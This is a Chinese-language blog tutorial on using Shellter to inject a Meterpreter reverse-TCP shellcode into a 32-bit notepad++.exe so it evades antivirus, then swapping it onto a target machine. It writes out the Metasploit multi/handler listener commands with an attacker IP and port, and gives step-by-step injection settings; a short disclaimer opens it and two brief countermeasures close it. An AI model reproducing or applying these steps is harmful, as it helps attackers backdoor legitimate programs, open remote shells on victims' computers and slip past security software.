shellcode動態注入!
一顆小胡椒2023-01-24 10:15:10
聲明:本人堅決反對利用文章內容進行惡意攻擊行為,一切錯誤行為必將受到懲罰,綠色網絡需要靠我們共同維護,推薦大家在了解技術原理的前提下,更好的維護個人信息安全、企業安全、國家安全。
Shellter將shellcode動態注入到可執行程序中實現免殺效果(目前僅支持32位可執行程序),例如:notepad/notepad++,putty等。
MSF設置監聽
Kali系統設置設置Payload監聽
msf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set lhost 192.168.146.130msf6 exploit(multi/handler) > set lport 9999msf6 exploit(multi/handler) > set payload payload/windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > run
2
動態注入shellcode到nodepad++
下載shellter軟件并進行安裝,下載地址:https://www.shellterproject.com/download/
將notepad++.exe可執行程序復制到shellter軟件的安裝目錄
然后在當前目錄的空白處按住shift鍵,鼠標右擊,選擇“在此處打開powershell”,在命令窗口輸入:./shelter.exe,選擇A自動模式,N不進行在線版本更新。
然后輸入剛剛復制到根目錄的的nodepad++.exe
啟用隱身模式Y
選擇L列舉出來的payload,[1] metrpreter_reverse_tcp
寫入需監聽payload的目標主機的IP地址和端口號
最后就執行成功了,替換目標主機的notpad++.exe
應對措施
- 在軟件開發過程中,增加安全加固策略,以免被黑客進行shellcode注入作為后門木馬,影響用戶軟件的使用效果。
- 殺毒軟件要及時更新木馬特征庫,具有動態監控、查殺等功能,實時監控可疑行為。
一顆小胡椒
暫無描述